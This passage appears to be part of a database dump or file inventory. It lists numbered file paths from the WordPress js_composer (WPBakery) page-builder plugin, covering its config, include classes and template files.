(1093, 'wp-content/plugins/js_composer/config/lean-map.php'),
(1094, 'wp-content/plugins/js_composer/config/social/shortcode-vc-facebook.php'),
(1095, 'wp-content/plugins/js_composer/config/social/shortcode-vc-pinterest.php'),
(1096, 'wp-content/plugins/js_composer/config/social/shortcode-vc-tweetmeme.php'),
(1097, 'wp-content/plugins/js_composer/config/structure/shortcode-vc-raw-html.php'),
(1098, 'wp-content/plugins/js_composer/config/structure/shortcode-vc-raw-js.php'),
(1099, 'wp-content/plugins/js_composer/config/structure/shortcode-vc-widget-sidebar.php'),
(1100, 'wp-content/plugins/js_composer/config/templates.php'),
(1101, 'wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-accordion.php'),
(1102, 'wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-pageable.php'),
(1103, 'wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-section.php'),
(1104, 'wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tabs.php'),
(1105, 'wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tour.php'),
(1106, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-archives.php'),
(1107, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-calendar.php'),
(1108, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-categories.php'),
(1109, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-custommenu.php'),
(1110, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-links.php'),
(1111, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-meta.php'),
(1112, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-pages.php'),
(1113, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-posts.php'),
(1114, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-recentcomments.php'),
(1115, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-rss.php'),
(1116, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-search.php'),
(1117, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-tagcloud.php'),
(1118, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-text.php'),
(1119, 'wp-content/plugins/js_composer/include/autoload/bc-access-rules-4.8.php'),
(1120, 'wp-content/plugins/js_composer/include/autoload/bc-multisite-options.php'),
(1121, 'wp-content/plugins/js_composer/include/autoload/class-vc-settings-presets.php'),
(1122, 'wp-content/plugins/js_composer/include/autoload/class-vc-vendor-presets.php'),
(1123, 'wp-content/plugins/js_composer/include/autoload/hook-vc-grid.php'),
(1124, 'wp-content/plugins/js_composer/include/autoload/hook-vc-iconpicker-param.php'),
(1125, 'wp-content/plugins/js_composer/include/autoload/hook-vc-message.php'),
(1126, 'wp-content/plugins/js_composer/include/autoload/hook-vc-pie.php'),
(1127, 'wp-content/plugins/js_composer/include/autoload/hook-vc-progress-bar.php'),
(1128, 'wp-content/plugins/js_composer/include/autoload/hook-vc-wp-text.php'),
(1129, 'wp-content/plugins/js_composer/include/autoload/params/hidden.php'),
(1130, 'wp-content/plugins/js_composer/include/autoload/params/vc_grid_item.php'),
(1131, 'wp-content/plugins/js_composer/include/autoload/params-to-init.php'),
(1132, 'wp-content/plugins/js_composer/include/autoload/post-type-default-template.php'),
(1133, 'wp-content/plugins/js_composer/include/autoload/ui-vc-pointers.php'),
(1134, 'wp-content/plugins/js_composer/include/autoload/vc-grid-item-editor.php'),
(1135, 'wp-content/plugins/js_composer/include/autoload/vc-image-filters.php'),
(1136, 'wp-content/plugins/js_composer/include/autoload/vc-pages/automapper.php'),
(1137, 'wp-content/plugins/js_composer/include/autoload/vc-pages/page-custom-css.php'),
(1138, 'wp-content/plugins/js_composer/include/autoload/vc-pages/page-design-options.php'),
(1139, 'wp-content/plugins/js_composer/include/autoload/vc-pages/page-role-manager.php'),
(1140, 'wp-content/plugins/js_composer/include/autoload/vc-pages/pages.php'),
(1141, 'wp-content/plugins/js_composer/include/autoload/vc-pages/settings-tabs.php'),
(1142, 'wp-content/plugins/js_composer/include/autoload/vc-pages/welcome-screen.php'),
(1143, 'wp-content/plugins/js_composer/include/autoload/vc-pointers-backend-editor.php'),
(1144, 'wp-content/plugins/js_composer/include/autoload/vc-pointers-frontend-editor.php'),
(1145, 'wp-content/plugins/js_composer/include/autoload/vc-settings-presets.php'),
(1146, 'wp-content/plugins/js_composer/include/autoload/vc-shortcode-autoloader.php'),
(1147, 'wp-content/plugins/js_composer/include/autoload/vc-single-image.php'),
(1148, 'wp-content/plugins/js_composer/include/autoload/vc-undoredo.php'),
(1149, 'wp-content/plugins/js_composer/include/autoload/vendors/acf.php'),
(1150, 'wp-content/plugins/js_composer/include/autoload/vendors/cf7.php'),
(1151, 'wp-content/plugins/js_composer/include/autoload/vendors/gravity_forms.php'),
(1152, 'wp-content/plugins/js_composer/include/autoload/vendors/gutenberg.php'),
(1153, 'wp-content/plugins/js_composer/include/autoload/vendors/jwplayer.php'),
(1154, 'wp-content/plugins/js_composer/include/autoload/vendors/layerslider.php'),
(1155, 'wp-content/plugins/js_composer/include/autoload/vendors/mqtranslate.php'),
(1156, 'wp-content/plugins/js_composer/include/autoload/vendors/ninja_forms.php'),
(1157, 'wp-content/plugins/js_composer/include/autoload/vendors/qtranslate-x.php'),
(1158, 'wp-content/plugins/js_composer/include/autoload/vendors/qtranslate.php'),
(1159, 'wp-content/plugins/js_composer/include/autoload/vendors/revslider.php'),
(1160, 'wp-content/plugins/js_composer/include/autoload/vendors/shortcode-vc-gutenberg.php'),
(1161, 'wp-content/plugins/js_composer/include/autoload/vendors/woocommerce.php'),
(1162, 'wp-content/plugins/js_composer/include/autoload/vendors/wpml.php'),
(1163, 'wp-content/plugins/js_composer/include/autoload/vendors/yoast_seo.php'),
(1164, 'wp-content/plugins/js_composer/include/classes/core/access/abstract-class-vc-access.php'),
(1165, 'wp-content/plugins/js_composer/include/classes/core/access/class-vc-current-user-access-controller.php'),
(1166, 'wp-content/plugins/js_composer/include/classes/core/access/class-vc-current-user-access.php'),
(1167, 'wp-content/plugins/js_composer/include/classes/core/access/class-vc-role-access-controller.php'),
(1168, 'wp-content/plugins/js_composer/include/classes/core/access/class-vc-role-access.php'),
(1169, 'wp-content/plugins/js_composer/include/classes/core/class-vc-base.php'),
(1170, 'wp-content/plugins/js_composer/include/classes/core/class-vc-manager.php'),
(1171, 'wp-content/plugins/js_composer/include/classes/core/class-vc-mapper.php'),
(1172, 'wp-content/plugins/js_composer/include/classes/core/class-vc-modifications.php'),
(1173, 'wp-content/plugins/js_composer/include/classes/core/class-vc-page.php'),
(1174, 'wp-content/plugins/js_composer/include/classes/core/class-vc-pages-group.php'),
(1175, 'wp-content/plugins/js_composer/include/classes/core/class-vc-post-admin.php'),
(1176, 'wp-content/plugins/js_composer/include/classes/core/class-vc-shared-library.php'),
(1177, 'wp-content/plugins/js_composer/include/classes/core/class-vc-sort.php'),
(1178, 'wp-content/plugins/js_composer/include/classes/core/class-wpb-map.php'),
(1179, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/class-vc-shared-templates.php'),
(1180, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wp-import.php'),
(1181, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-plugin.php'),
(1182, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-regex.php'),
(1183, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-simplexml.php'),
(1184, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser-xml.php'),
(1185, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wxr-parser.php'),
(1186, 'wp-content/plugins/js_composer/include/classes/deprecated/helpers_deprecated.php'),
(1187, 'wp-content/plugins/js_composer/include/classes/deprecated/interfaces.php'),
(1188, 'wp-content/plugins/js_composer/include/classes/editors/class-vc-backend-editor.php'),
(1189, 'wp-content/plugins/js_composer/include/classes/editors/class-vc-edit-form-fields.php'),
(1190, 'wp-content/plugins/js_composer/include/classes/editors/class-vc-frontend-editor.php'),
(1191, 'wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar-frontend.php'),
(1192, 'wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar-undoredo.php'),
(1193, 'wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar.php'),
(1194, 'wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-add-element-box.php'),
(1195, 'wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-edit-layout.php'),
(1196, 'wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-post-settings.php'),
(1197, 'wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-preset-panel-editor.php'),
(1198, 'wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-shortcode-edit-form.php'),
(1199, 'wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-templates-panel-editor.php'),
(1200, 'wp-content/plugins/js_composer/include/classes/settings/automapper/automapper.php'),
(1201, 'wp-content/plugins/js_composer/include/classes/settings/automapper/class-vc-automap-model.php'),
(1202, 'wp-content/plugins/js_composer/include/classes/settings/automapper/class-vc-automapper.php'),
(1203, 'wp-content/plugins/js_composer/include/classes/settings/class-vc-license.php'),
(1204, 'wp-content/plugins/js_composer/include/classes/settings/class-vc-roles.php'),
(1205, 'wp-content/plugins/js_composer/include/classes/settings/class-vc-settings.php'),
(1206, 'wp-content/plugins/js_composer/include/classes/shortcodes/core/class-vc-shortcodes-manager.php'),
(1207, 'wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wbpakeryshortcodefishbones.php'),
(1208, 'wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wpbakery-visualcomposer-abstract.php'),
(1209, 'wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wpbakeryshortcode.php'),
(1210, 'wp-content/plugins/js_composer/include/classes/shortcodes/core/class-wpbakeryshortcodescontainer.php'),
(1211, 'wp-content/plugins/js_composer/include/classes/shortcodes/layerslider-vc.php'),
(1212, 'wp-content/plugins/js_composer/include/classes/shortcodes/paginator/class-vc-pageable.php'),
(1213, 'wp-content/plugins/js_composer/include/classes/shortcodes/rev-slider-vc.php'),
(1214, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-accordion-tab.php'),
(1215, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-accordion.php'),
(1216, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-basic-grid.php'),
(1217, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-btn.php'),
(1218, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-button.php'),
(1219, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-button2.php'),
(1220, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-column-inner.php'),
(1221, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-column-text.php'),
(1222, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-column.php'),
(1223, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-cta-button.php'),
(1224, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-cta-button2.php'),
(1225, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-cta.php'),
(1226, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-custom-field.php'),
(1227, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-custom-heading.php'),
(1228, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-empty-space.php'),
(1229, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-facebook.php'),
(1230, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-flickr.php'),
(1231, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gallery.php'),
(1232, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-animated-block.php'),
(1233, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-col.php'),
(1234, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-image.php'),
(1235, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-author.php'),
(1236, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-categories.php'),
(1237, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-data.php'),
(1238, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-date.php'),
(1239, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-excerpt.php'),
(1240, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-meta.php'),
(1241, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-post-title.php'),
(1242, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-row.php'),
(1243, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-a.php'),
(1244, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-b.php'),
(1245, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-c.php'),
(1246, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone.php'),
(1247, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem.php'),
(1248, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gmaps.php'),
(1249, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-googleplus.php'),
(1250, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gutenberg.php'),
(1251, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-hoverbox.php'),
(1252, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-icon.php'),
(1253, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-images-carousel.php'),
(1254, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-line-chart.php'),
(1255, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-masonry-grid.php'),
(1256, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-masonry-media-grid.php'),
(1257, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-media-grid.php'),
(1258, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-message.php'),
(1259, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-pie.php'),
(1260, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-pinterest.php'),
(1261, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-posts-slider.php'),
(1262, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-progress-bar.php'),
(1263, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-raw-html.php'),
(1264, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-raw-js.php'),
(1265, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-round-chart.php'),
(1266, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-row-inner.php'),
(1267, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-row.php'),
(1268, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-section.php'),
(1269, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-separator.php'),
(1270, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-single-image.php'),
(1271, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-tab.php'),
(1272, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-tabs.php'),
(1273, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-text-separator.php'),
(1274, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-toggle.php'),
(1275, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-tour.php'),
(1276, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-accordion.php'),
(1277, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-pageable.php'),
(1278, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-section.php'),
(1279, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-tabs.php'),
(1280, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-tour.php'),
(1281, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-tweetmeme.php'),
(1282, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-twitter.php'),
(1283, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-video.php'),
(1284, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-widget-sidebar.php'),
(1285, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-zigzag.php'),
(1286, 'wp-content/plugins/js_composer/include/classes/shortcodes/wordpress-widgets.php'),
(1287, 'wp-content/plugins/js_composer/include/classes/updaters/class-vc-updater.php'),
(1288, 'wp-content/plugins/js_composer/include/classes/updaters/class-vc-updating-manager.php'),
(1289, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-acf-shortcode.php'),
(1290, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-gitem-acf-shortcode.php'),
(1291, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-attributes.php'),
(1292, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-shortcodes.php'),
(1293, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/shortcode.php'),
(1294, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-advanced-custom-fields.php'),
(1295, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-contact-form7.php'),
(1296, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-jwplayer.php'),
(1297, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-layerslider.php'),
(1298, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-mqtranslate.php'),
(1299, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-ninja-forms.php'),
(1300, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-qtranslate-x.php'),
(1301, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-qtranslate.php'),
(1302, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-revslider.php'),
(1303, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-woocommerce.php'),
(1304, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-wpml.php'),
(1305, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-yoast_seo.php'),
(1306, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/class-vc-gitem-woocommerce-shortcode.php'),
(1307, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-attributes.php'),
(1308, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-filters.php'),
(1309, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-shortcodes.php'),
(1310, 'wp-content/plugins/js_composer/include/helpers/class-vc-color-helper.php'),
(1311, 'wp-content/plugins/js_composer/include/helpers/class-vc-image-filter.php'),
(1312, 'wp-content/plugins/js_composer/include/helpers/helpers.php'),
(1313, 'wp-content/plugins/js_composer/include/helpers/helpers_api.php'),
(1314, 'wp-content/plugins/js_composer/include/helpers/helpers_factory.php'),
(1315, 'wp-content/plugins/js_composer/include/params/animation_style/animation_style.php'),
(1316, 'wp-content/plugins/js_composer/include/params/autocomplete/autocomplete.php'),
(1317, 'wp-content/plugins/js_composer/include/params/colorpicker/colorpicker.php'),
(1318, 'wp-content/plugins/js_composer/include/params/column_offset/column_offset.php'),
(1319, 'wp-content/plugins/js_composer/include/params/css_editor/css_editor.php'),
(1320, 'wp-content/plugins/js_composer/include/params/custom_markup/custom_markup.php'),
(1321, 'wp-content/plugins/js_composer/include/params/default_params.php'),
(1322, 'wp-content/plugins/js_composer/include/params/el_id/el_id.php'),
(1323, 'wp-content/plugins/js_composer/include/params/font_container/font_container.php'),
(1324, 'wp-content/plugins/js_composer/include/params/google_fonts/google_fonts.php'),
(1325, 'wp-content/plugins/js_composer/include/params/gutenberg/class-vc-gutenberg-param.php'),
(1326, 'wp-content/plugins/js_composer/include/params/gutenberg/gutenberg.php'),
(1327, 'wp-content/plugins/js_composer/include/params/hidden/hidden.php'),
(1328, 'wp-content/plugins/js_composer/include/params/href/href.php'),
(1329, 'wp-content/plugins/js_composer/include/params/iconpicker/iconpicker.php'),
(1330, 'wp-content/plugins/js_composer/include/params/load.php'),
(1331, 'wp-content/plugins/js_composer/include/params/loop/loop.php'),
(1332, 'wp-content/plugins/js_composer/include/params/options/options.php'),
(1333, 'wp-content/plugins/js_composer/include/params/param_group/param_group.php'),
(1334, 'wp-content/plugins/js_composer/include/params/params.php'),
(1335, 'wp-content/plugins/js_composer/include/params/params_preset/params_preset.php'),
(1336, 'wp-content/plugins/js_composer/include/params/sorted_list/sorted_list.php'),
(1337, 'wp-content/plugins/js_composer/include/params/tab_id/tab_id.php'),
(1338, 'wp-content/plugins/js_composer/include/params/textarea_html/textarea_html.php'),
(1339, 'wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_element.php'),
(1340, 'wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_id/vc_grid_id.php'),
(1341, 'wp-content/plugins/js_composer/include/params/vc_grid_item/attributes.php'),
(1342, 'wp-content/plugins/js_composer/include/params/vc_grid_item/class-vc-grid-item.php'),
(1343, 'wp-content/plugins/js_composer/include/params/vc_grid_item/class-wpb-map-grid-item.php'),
(1344, 'wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-editor.php'),
(1345, 'wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-preview.php'),
(1346, 'wp-content/plugins/js_composer/include/params/vc_grid_item/editor/navbar/class-vc-navbar-grid-item.php'),
(1347, 'wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-add-element-box-grid-item.php'),
(1348, 'wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-templates-editor-grid-item.php'),
(1349, 'wp-content/plugins/js_composer/include/params/vc_grid_item/shortcodes.php'),
(1350, 'wp-content/plugins/js_composer/include/params/vc_grid_item/templates.php'),
(1351, 'wp-content/plugins/js_composer/include/params/vc_link/vc_link.php'),
(1352, 'wp-content/plugins/js_composer/include/templates/editors/backend_editor.tpl.php'),
(1353, 'wp-content/plugins/js_composer/include/templates/editors/frontend_editor.tpl.php'),
(1354, 'wp-content/plugins/js_composer/include/templates/editors/frontend_template.tpl.php'),
(1355, 'wp-content/plugins/js_composer/include/templates/editors/navbar/navbar.tpl.php'),
(1356, 'wp-content/plugins/js_composer/include/templates/editors/partials/access-manager-js.tpl.php'),
(1357, 'wp-content/plugins/js_composer/include/templates/editors/partials/add_element_search.tpl.php'),
(1358, 'wp-content/plugins/js_composer/include/templates/editors/partials/add_element_tabs.tpl.php'),
(1359, 'wp-content/plugins/js_composer/include/templates/editors/partials/backend-shortcodes-templates.tpl.php'),
(1360, 'wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls.tpl.php'),
(1361, 'wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls_tab.tpl.php'),
(1362, 'wp-content/plugins/js_composer/include/templates/editors/partials/backend_editor_footer.tpl.php'),
(1363, 'wp-content/plugins/js_composer/include/templates/editors/partials/frontend_controls.tpl.php'),
(1364, 'wp-content/plugins/js_composer/include/templates/editors/partials/post_shortcodes.tpl.php'),
(1365, 'wp-content/plugins/js_composer/include/templates/editors/partials/prompt-presets.tpl.php'),
(1366, 'wp-content/plugins/js_composer/include/templates/editors/partials/prompt-templates.tpl.php'),
(1367, 'wp-content/plugins/js_composer/include/templates/editors/partials/settings_presets_popup.tpl.php'),
(1368, 'wp-content/plugins/js_composer/include/templates/editors/partials/templates_search.tpl.php'),
(1369, 'wp-content/plugins/js_composer/include/templates/editors/partials/vc_settings-image-block.tpl.php'),
(1370, 'wp-content/plugins/js_composer/include/templates/editors/partials/vc_ui-settings-dropdown.tpl.php'),
(1371, 'wp-content/plugins/js_composer/include/templates/editors/partials/vc_ui-templates-tabs.tpl.php'),
(1372, 'wp-content/plugins/js_composer/include/templates/editors/partials/vc_welcome_block.tpl.php'),
(1373, 'wp-content/plugins/js_composer/include/templates/editors/popups/modal_edit_element.tpl.php'),
(1374, 'wp-content/plugins/js_composer/include/templates/editors/popups/panel_multi_shortcode_edit_form.tpl.php'),
(1375, 'wp-content/plugins/js_composer/include/templates/editors/popups/panel_shortcode_edit_form.tpl.php'),
(1376, 'wp-content/plugins/js_composer/include/templates/editors/popups/shared-templates/category.tpl.php'),
(1377, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-footer.tpl.php'),
(1378, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-header.tpl.php'),
(1379, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-add-element.tpl.php'),
(1380, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-edit-element.tpl.php'),
(1381, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-post-settings.tpl.php'),
(1382, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-preset.tpl.php'),
(1383, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-row-layout.tpl.php'),
(1384, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-templates.tpl.php'),
(1385, 'wp-content/plugins/js_composer/include/templates/editors/vc_ui-template-preview.tpl.php'),
(1386, 'wp-content/plugins/js_composer/include/templates/pages/partials/_settings_tabs.php'),
(1387, 'wp-content/plugins/js_composer/include/templates/pages/partials/_tabs.php'),
(1388, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_backend_editor.tpl.php'),
(1389, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_dragndrop.tpl.php'),
(1390, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_frontend_editor.tpl.php'),
(1391, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_grid_builder.tpl.php'),
(1392, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_part.tpl.php'),
(1393, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_settings.tpl.php'),
(1394, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_types.tpl.php'),
(1395, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_presets.tpl.php'),
(1396, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_settings.tpl.php'),
(1397, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_shortcodes.tpl.php'),
(1398, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_templates.tpl.php'),
(1399, 'wp-content/plugins/js_composer/include/templates/pages/vc-settings/default-template-post-type.tpl.php'),
(1400, 'wp-content/plugins/js_composer/include/templates/pages/vc-settings/index.php'),
(1401, 'wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab-vc-roles.php'),
(1402, 'wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab.php'),
(1403, 'wp-content/plugins/js_composer/include/templates/pages/vc-settings/vc-automapper.php'),
(1404, 'wp-content/plugins/js_composer/include/templates/pages/vc-welcome/index.php'),
(1405, 'wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-faq.php'),
(1406, 'wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-resources.php'),
(1407, 'wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-welcome.php'),
(1408, 'wp-content/plugins/js_composer/include/templates/params/column_offset/template.tpl.php'),
(1409, 'wp-content/plugins/js_composer/include/templates/params/google_fonts/template.php'),
(1410, 'wp-content/plugins/js_composer/include/templates/params/loop/templates.html'),
(1411, 'wp-content/plugins/js_composer/include/templates/params/options/templates.html'),
(1412, 'wp-content/plugins/js_composer/include/templates/params/param_group/add.tpl.php'),
(1413, 'wp-content/plugins/js_composer/include/templates/params/param_group/content.tpl.php'),
(1414, 'wp-content/plugins/js_composer/include/templates/params/param_group/inner_content.tpl.php'),
(1415, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/featured_image.php'),
(1416, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/post_categories.php'),
(1417, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/vc_btn.php'),
(1418, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/partials/vc_grid_item_editor_footer.tpl.php'),
(1419, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_grid_item_editor.tpl.php'),
(1420, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_ui-template-preview.tpl.php'),
(1421, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/preview.tpl.php'),
(1422, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_btn.php'),
(1423, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_button2.php'),
(1424, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_custom_heading.php'),
(1425, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_icon.php'),
(1426, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_single_image.php'),
(1427, 'wp-content/plugins/js_composer/include/templates/shortcodes/layerslider_vc.php'),
(1428, 'wp-content/plugins/js_composer/include/templates/shortcodes/post_block/_item.php'),
